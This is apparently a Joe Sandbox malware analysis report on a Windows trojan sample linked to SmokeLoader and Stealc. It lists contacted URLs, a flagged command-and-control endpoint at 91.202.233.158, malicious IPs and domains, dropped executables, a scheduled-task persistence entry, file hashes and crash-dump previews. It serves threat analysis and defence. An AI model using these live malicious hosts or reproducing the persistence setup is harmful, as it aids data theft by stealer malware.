                      https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AAexplorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-cexplorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.drfalse
                      • URL Reputation: safe
                      unknown
                      https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reveexplorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crls.ssl.com/ssl.com-rsa-RootCA.crl09A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.drfalse
                      • URL Reputation: safe
                      unknown
                      https://powerpoint.office.comEMdexplorer.exe, 00000002.00000000.2166104527.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://91.202.233.158jsvchost015.exe, 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.drfalse
                      • URL Reputation: safe
                      unknown
                      https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.2166104527.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://outlook.comeexplorer.exe, 00000002.00000000.2166104527.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nationexplorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000002.00000000.2163555147.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.msn.com/explorer.exe, 00000002.00000000.2163021353.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3138931305.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3361492931.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3145313076.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3133714532.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3154032054.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008C0D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.msn.com:443/en-us/feedexplorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://91.202.233.158/e96ea2db21fa9a1b.php5d1ef941bc7800svchost015.exe, 00000007.00000002.2809296945.00000000009FC000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      http://www.x-ways.net/winhex/license9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-eiexplorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      91.202.233.158
                      unknownRussian Federation
                      9009M247GBtrue
                      84.32.84.152
                      free.cdn.hstgr.netLithuania
                      33922NTT-LT-ASLTtrue
                      2.185.214.11
                      epohe.ruIran (ISLAMIC Republic Of)
                      58224TCIIRtrue
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1502739
                      Start date and time:2024-09-02 08:19:23 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 6m 52s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:26
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:1
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:oZB7n3wuNk.exe
                      renamed because original name is a hash value
                      Original Sample Name:a4bc249dc997df25a0e709eee0a0df87.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@8/11@3/3
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 40
                      • Number of non-executed functions: 8
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): dllhost.exe, UserOOBEBroker.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, svchost.exe, StartMenuExperienceHost.exe, TextInputHost.exe, mobsync.exe
                      • Excluded IPs from analysis (whitelisted): 204.79.197.203, 2.23.209.150, 2.23.209.158, 2.23.209.153, 2.23.209.166, 2.23.209.156, 2.23.209.160, 2.23.209.162, 2.23.209.161, 2.23.209.154, 2.23.209.179, 2.23.209.183, 2.23.209.191, 2.23.209.186, 2.23.209.187, 2.23.209.182, 2.23.209.188, 2.23.209.185, 2.23.209.189
                      • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, r.bing.com.edgekey.net, a-0003.a-msedge.net, ctldl.windowsupdate.com, p-static.bing.trafficmanager.net, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, r.bing.com, api-msn-com.a-0003.a-msedge.net
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtEnumerateKey calls found.
                      • Report size getting too big, too many NtEnumerateValueKey calls found.
                      • Report size getting too big, too many NtOpenFile calls found.
                      • Report size getting too big, too many NtOpenKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Report size getting too big, too many NtSetInformationFile calls found.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      TimeTypeDescription
                      02:20:30API Interceptor100023x Sleep call for process: explorer.exe modified
                      08:20:36Task SchedulerRun new task: Firefox Default Browser Agent 3689BA73780E4DA0 path: C:\Users\user\AppData\Roaming\birajci
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      91.202.233.158mLn7GEEpuS.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                      • 91.202.233.158/e96ea2db21fa9a1b.php
                      V6n3oygctH.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                      • 91.202.233.158/e96ea2db21fa9a1b.php
                      h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                      • 91.202.233.158/e96ea2db21fa9a1b.php
                      h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                      • 91.202.233.158/e96ea2db21fa9a1b.php
                      2.185.214.11jvR4ju7uPW.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                      • mzxn.ru/tmp/index.php
                      z0PrDUH3Ab.exeGet hashmaliciousSmokeLoaderBrowse
                      • movlat.com/tmp/
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      epohe.rumLn7GEEpuS.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                      • 175.119.10.231
                      V6n3oygctH.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                      • 211.181.24.132
                      h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                      • 105.155.13.153
                      h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                      • 185.12.79.25
                      free.cdn.hstgr.netmLn7GEEpuS.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                      • 185.77.97.68
                      V6n3oygctH.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                      • 84.32.84.249
                      h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                      • 84.32.84.88
                      h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                      • 84.32.84.144
                      https://olive-hummingbird-763499.hostingersite.com/Onedrive-inboxmessage/onenote.html#asa@aan.ptGet hashmaliciousUnknownBrowse
                      • 154.62.105.236
                      https://olive-hummingbird-763499.hostingersite.com/Onedrive-inboxmessage/onenote.html%23e.szejgis@arlen.com.pl&c=E%2C10%2CGElLHQ3V9C4dUNBFMZt1mVRH2LpMhvMQrmpyxCta58errD7FQTDbxAt4Y5cCMR6WJVxZVMHk4h8%2BUN47&typo=1&know=0Get hashmaliciousUnknownBrowse
                      • 84.32.84.212
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      NTT-LT-ASLTV6n3oygctH.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                      • 84.32.84.249
                      http://cloud-log.blogspot.co.ke/Get hashmaliciousUnknownBrowse
                      • 84.32.84.33
                      h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                      • 84.32.84.88
                      h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                      • 84.32.84.144
                      PI 30_08_2024.exeGet hashmaliciousFormBookBrowse
                      • 84.32.84.32
                      play.exeGet hashmaliciousFormBookBrowse
                      • 84.32.84.32
                      ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                      • 84.32.84.32
                      LPO 92558 & 92669.exeGet hashmaliciousFormBookBrowse
                      • 84.32.84.88
                      GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exeGet hashmaliciousFormBookBrowse
                      • 84.32.84.32
                      Curriculum Vitae.exeGet hashmaliciousFormBookBrowse
                      • 84.32.84.32
                      M247GBmLn7GEEpuS.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                      • 91.202.233.158
                      V6n3oygctH.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                      • 91.202.233.158
                      h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                      • 91.202.233.158
                      h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                      • 91.202.233.158
                      firmware.arm-linux-gnueabihf.elfGet hashmaliciousUnknownBrowse
                      • 172.111.253.69
                      sora.m68k.elfGet hashmaliciousMiraiBrowse
                      • 158.46.140.117
                      OFFER-INQUIRY.jarGet hashmaliciousSTRRATBrowse
                      • 37.120.199.54
                      http://stream.crichd.vip/update/sscricket.phpGet hashmaliciousUnknownBrowse
                      • 38.132.109.126
                      1724161253.9014926.dllGet hashmaliciousUnknownBrowse
                      • 172.86.67.94
                      1724161253.9014926.dllGet hashmaliciousUnknownBrowse
                      • 172.86.67.94
                      TCIIRmirai.mpsl.elfGet hashmaliciousMiraiBrowse
                      • 217.219.172.133
                      mirai.ppc.elfGet hashmaliciousMiraiBrowse
                      • 193.239.197.42
                      SecuriteInfo.com.Linux.Siggen.9999.6015.2041.elfGet hashmaliciousMiraiBrowse
                      • 217.219.38.90
                      jew.x86.elfGet hashmaliciousUnknownBrowse
                      • 37.255.252.250
                      xd.x86.elfGet hashmaliciousMiraiBrowse
                      • 85.185.108.192
                      KKveTTgaAAsecNNaaaa.spc.elfGet hashmaliciousUnknownBrowse
                      • 164.215.186.35
                      BafkIYUCdg.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                      • 217.219.131.81
                      yKNb9xVRKP.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                      • 217.219.131.81
                      oc_x86_64.elfGet hashmaliciousMiraiBrowse
                      • 2.179.223.33
                      Compensation_July_2024_Fr._Meyer_s_Sohn_774d69d42b7d81c4bef3847f4a902904burcu.ucarburcu.ucar.pdfGet hashmaliciousPhisherBrowse
                      • 217.219.67.160
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      a0e9f5d64349fb13191bc781f81f42e15QfB8N2Jte.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                      • 84.32.84.152
                      x6N3TgPQvm.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                      • 84.32.84.152
                      mth9UWp36C.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                      • 84.32.84.152
                      mLisubeK3B.exeGet hashmaliciousLummaCBrowse
                      • 84.32.84.152
                      4BPdl1loHY.exeGet hashmaliciousLummaCBrowse
                      • 84.32.84.152
                      7IMcMa3pcr.exeGet hashmaliciousLummaCBrowse
                      • 84.32.84.152
                      j16WMVKwYE.exeGet hashmaliciousLummaCBrowse
                      • 84.32.84.152
                      quotation.jsGet hashmaliciousUnknownBrowse
                      • 84.32.84.152
                      81bl0ZlcJ3.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                      • 84.32.84.152
                      ejH1Ma9DnJ.exeGet hashmaliciousLummaC, VidarBrowse
                      • 84.32.84.152
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Users\user\AppData\Local\Temp\svchost015.exemLn7GEEpuS.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                        V6n3oygctH.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                          h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                            h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                              ACGPhnMVxb.exeGet hashmaliciousCryptOne, RHADAMANTHYSBrowse
                                2eqt27LXwV.exeGet hashmaliciousCryptOne, RHADAMANTHYSBrowse
                                  uxx8jvvSHl.exeGet hashmaliciousLummaC, CryptOneBrowse
                                    1wM0OWBdv5.exeGet hashmaliciousLummaC, CryptOneBrowse
                                      1wM0OWBdv5.exeGet hashmaliciousLummaC, CryptOneBrowse
                                        JZ9FCJzkXL.exeGet hashmaliciousLummaC, CryptOneBrowse
                                          C:\Users\user\AppData\Local\Temp\9A25.exemLn7GEEpuS.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                                            V6n3oygctH.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                                              h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                                                h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                                                  Process:C:\Windows\System32\WerFault.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):65536
                                                  Entropy (8bit):2.255204353797818
                                                  Encrypted:false
                                                  SSDEEP:384:aKEC1LrEaJajAWyY9olRb5cWzuiFIY4lO8k:an8rEaJaj6YyjbeWzuiFIY4lO8
                                                  MD5:546292DBEA11F235CE66119629C4673A
                                                  SHA1:7A4BADFE7912244EE658DAA392C6D2B6ED7DD5B6
                                                  SHA-256:D317AE30C64EEA6CAEA0E93B91FA474E8C2A5079F8A07091A271ECA4B77F4DC7
                                                  SHA-512:8223AF77CBFA902D3D4D440EB596396D57CC716645371D88E091EC139746AC112EC29D9380CC2B577FC75BA59CF521C68A25A0D97806D55F6C486431F98AFD5D
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.7.3.1.7.0.8.7.9.2.1.6.7.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.F.l.a.g.s.=.5.2.4.2.8.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.8.c.e.5.2.e.-.7.5.9.4.-.4.f.7.d.-.b.0.c.6.-.0.e.1.b.9.b.6.3.6.e.3.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.4.b.f.f.0.0.2.-.0.1.6.2.-.4.0.2.e.-.8.0.7.c.-.1.2.0.6.6.7.4.8.1.b.a.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.E.x.p.l.o.r.e.r...E.X.E.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.a.4.-.0.0.0.1.-.0.0.1.5.-.5.c.9.0.-.d.1.f.b.f.2.f.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.0.2././.1.2././.2.1.:.2.0.:.5.
                                                  Process:C:\Windows\System32\WerFault.exe
                                                  File Type:Mini DuMP crash report, 17 streams, CheckSum 0x00000004, Mon Sep 2 06:21:50 2024, 0x1205a4 type
                                                  Category:dropped
                                                  Size (bytes):1070728
                                                  Entropy (8bit):1.3775739331810397
                                                  Encrypted:false
                                                  SSDEEP:1536:HloDoDIrXasN705dHUtGxHfIByClro4H/+2ZQRYlH1rbTspWr9J+:FoDoIWsN70ItG1goCOa+2B5b5+
                                                  MD5:DF0844916F1CA0A15E825F3FB3FAA965
                                                  SHA1:6C88C0D7C80D2B655EF7494A89C4255E8CA5BE8C
                                                  SHA-256:455E88DB2EE0D6E5DD74E02FFE734803C642FB290C3DD4B2F5A2917C9E31BB91
                                                  SHA-512:AD40DD45D3DCCCEEEE32FF2C0A332E1A9414C4702BF6A86115486A2F034716AA385812F386E5C25B7B79A80759402EE25F2D8D54233E6675AA791F3AAC4F91E3
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:MDMP..a..... .......~Y.f................ .......Tj..@.......|...........................x...........x.......8...........T...$........`.....................................X...............................................................................eJ......t.......Lw......................T............B.f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...............................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\WerFault.exe
                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):10814
                                                  Entropy (8bit):3.704604181259309
                                                  Encrypted:false
                                                  SSDEEP:192:R6l7wVeJurDqULe6YwG3gmfqzVsHGeiprX/89bFFEjfn3m:R6lXJuk6Yx3gmfqzVsXF2jfW
                                                  MD5:31FA2B1AB94DFCFF0CF5A8405D5788D8
                                                  SHA1:3FDABBB3BFF1CDB5479EF93228F855E5573AB773
                                                  SHA-256:0D5277A1B4D8C78DE9B8C9C60671A478C57005CCCDE4BD71DC6395F641753AA5
                                                  SHA-512:6E60DEFA3365E2FF9A69103B6E9D3B4483AD453B7E2F5DD05EA804FECCC4F95AD2313C475DDA09E16AAD252FDE97E7F1CA55EE28DBCE58687009D7867FF961B7
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.0.4.<./.P.i.
                                                  Process:C:\Windows\System32\WerFault.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):4724
                                                  Entropy (8bit):4.464088896132567
                                                  Encrypted:false
                                                  SSDEEP:48:cvIwWl8zsaJg771I9LpSWpW8VY8VRYm8M4JYmFHyq85ckb9Q3jd:uIjfoI7Mpz7VxQJvGba3jd
                                                  MD5:91D17E2EC51FFB087EDA6DD7BCF2EC94
                                                  SHA1:097C61F8EDAE16426C0C3F5538C483C102BDAE22
                                                  SHA-256:D7551B980DE8FE760467851AB0039EB381D075ED7D150DA6E6A78A7A014620D0
                                                  SHA-512:F6DD1510FF17C090A13DC6BB218DBF91CDBE1C409D4684AD9B151AC8768AEC1272CF4B5ED97B6334C921CA642AD722B114ED9FF0BC8190AAA2DCEE4E6704478C
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="482244" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                  Process:C:\Windows\explorer.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):107504
                                                  Entropy (8bit):3.9985590843457017
                                                  Encrypted:false
                                                  SSDEEP:768:iY18tKkRGmgCMqjk0Yc/ImXk1gqNoLlFRjwHGpPhYDR1vINVW1/mOypZr3EPUhyX:ilKkPgi/ImXk2otUh2i4GGnFrFuyK1F8
                                                  MD5:2BAAA36FDED2CDDF7F77656EC3E4A9BE
                                                  SHA1:8F3E54A90F341888C89FB8CFF949D18C62C3E491
                                                  SHA-256:38666CD6899B693CD963BEEE60EBC894DC2B357A8D5A552B6D1457DA9259ADD8
